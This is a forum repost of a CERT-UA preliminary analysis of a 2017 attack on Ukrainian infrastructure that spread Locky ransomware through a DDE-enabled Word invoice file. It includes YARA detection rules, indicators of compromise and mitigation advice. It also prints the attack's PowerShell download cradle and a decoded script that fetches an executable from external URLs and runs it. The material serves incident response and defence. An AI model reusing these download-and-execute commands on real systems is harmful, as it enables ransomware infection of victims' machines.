Украинский 1С форум: всё про 1С 8.3, 1С 8.2, 1С 8.1, 1С 8.0, 1С 7.7 > Кібератака. Розповсюдження шифрувальника Locky через DDE-атаку (попередній аналіз)

Помощь - Поиск - Пользователи - Календарь

Полная версия этой страницы: Кібератака. Розповсюдження шифрувальника Locky через DDE-атаку (попередній аналіз)

Украинский 1С форум: всё про 1С 8.3, 1С 8.2, 1С 8.1, 1С 8.0, 1С 7.7 > Новости > Бухгалтерский учет, налоги, последние изменения законодательства

Володя Гройсман

24.10.17, 19:50

В атаці 24.10.2017 на деякі об’єкти інфраструктури України використовувалася техніка DDE, яка активовувала виконання шкідливого коду на комп’ютері користувача.

Команді CERT-UA було надіслано для аналізу файл:

Invoice_file_916096.doc

36170f61b5c6e2c311a379704329237d

необходимо зарегистрироваться для просмотра ссылки

Файл для подальшої експлуатації використовув DDE-вразливість (CVE-2017-11826)

необходимо зарегистрироваться для просмотра ссылки

необходимо зарегистрироваться для просмотра ссылки

Виявити DDE-атаку можливо за допомогою наступної YARA-сигнатури:

YARA rules Office DDE

необходимо зарегистрироваться для просмотра ссылки

rule Office_DDEAUTO_field {
strings:
$a = /.+?\b[Dd][Dd][Ee][Aa][Uu][Tt][Oo]\b.+?/
condition:
$a
}

rule Office_DDE_field {
strings:
$a = /.+?\b[Dd][Dd][Ee]\b.+?/
condition:
$a
}

rule Office_OLE_DDEAUTO {
strings:
$a = /\x13\s*DDEAUTO\b[^\x14]+/ nocase
condition:
uint32be(0) == 0xD0CF11E0 and $a
}

rule Office_OLE_DDE {
strings:
$a = /\x13\s*DDE\b[^\x14]+/ nocase
condition:
uint32be(0) == 0xD0CF11E0 and $a
}

В результаті активації користувачем ole-гіперпосилання активовувався powershell-скрипт:

cmd.exe /k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create(‘http://urcho.com/JHGGsdsw6’)).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr (PID: 2872, Additional Context: new-object ((([Net.WebRequest]::Create(‘hxxp://urcho.com/JHGGsdsw6’)).GetResponse()).GetResponseStream()).ReadToEnd();;)

Даний скрипт підвантажував на систему користовувача закодовані base64-алгоритмом дані, а саме:

DQAKACQAdQByAGwAcwAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdABhAHQAaQBhAG4AYQBkAGUAY…

Результат декодування даних:

$urls = «http://tatianadecastelbajac.fr/kjhgFG»,»http://video.rb-webdev.de/kjhgFG»,»http://themclarenfamily.com/kjhgFG»
foreach($url in $urls){
Try
{
Write-Host $url
$fp = «$env:temp\heropad64.exe»
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
Write-Host $_.Exception.Message
}
}

Скрипт підвантажував на систему з одного з доступних на момент активації url адрес завантажувача з назвою heropad64.exe

(https://www.virustotal.com/ru/file/3d750de58563f860cd8f8674ce08e96b1f4e3ae3564c10efe61c50738056b0f2/analysis/), який в подальшому підвантажував на комп’ютер користувача шифрувальника файлів Locky.

Файл heropad64.exe підвантажував шифрувальника файлів Locky з наступного url:

hxxp://webhotell.enivest.no/cuYT39.enc

Дані пізніше розшифровувалися та збиралися в MZ/PE файл (https://www.virustotal.com/en/file/0f5be64bc9be27c4a9cab972f5a5879337cb8cfd155a84e62399ed34e8d5a1dc/analysis/1508841472/)

Командно-контрольний центр шифрувальника:

hxxp://gdiscoun.org

Індикатори компрометації:

hxxp://urcho.com/JHGGsdsw6
hxxp://tatianadecastelbajac.fr/kjhgFG
hxxp://video.rb-webdev.de/kjhgFG
hxxp://themclarenfamily.com/kjhgFG
hxxp://webhotell.enivest.no/cuYT39.enc
hxxp://gdiscoun.org

Рекомендації CERT—UA:

Заблокувати доступ до зазначених посилань.
Встановити оновлення Windows, які усувають вразливість DDE в Microsoft Office (CVE-2017-11826). (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11826)
Забезпечити неприпустимість відкриття вкладень у підозрілих повідомленнях (у листах від адресантів, щодо яких виникають сумніви, наприклад: автор з невідомих причин змінив мову спілкування; тема листа є нетиповою для автора; спосіб, у який автор звертається до адресата, є нетиповим тощо; а також у повідомленнях з нестандартним текстом, що спонукають до переходу на підозрілі посилання або до відкриття підозрілих файлів – архівів, виконуваних файлів і т.ін.).
Системним адміністраторам і адміністраторам безпеки звернути увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштовогой веб-трафіку.
Не працювати під правами адміністратора.
Обмежити можливість запуску виконуваних файлів (*.exe) на комп’ютерах користувачів з директорій %TEMP%, %APPDATA%.
Звернутися до необходимо зарегистрироваться для просмотра ссылки.

[b]Команда реагування на комп’ютерні надзвичайні події України CERT-UA Державної служби спеціального зв’язку та захисту інформації України працює цілодобово для надання консультацій та допомоги щодо усунення наслідків або попередження кібератаки з використанням шифрувальника файлів. тел. 281-88-25, 281-88-05, email: cert@cert.gov.ua[/b]

По материалам: необходимо зарегистрироваться для просмотра ссылки

Для просмотра полной версии этой страницы, пожалуйста, пройдите по ссылке.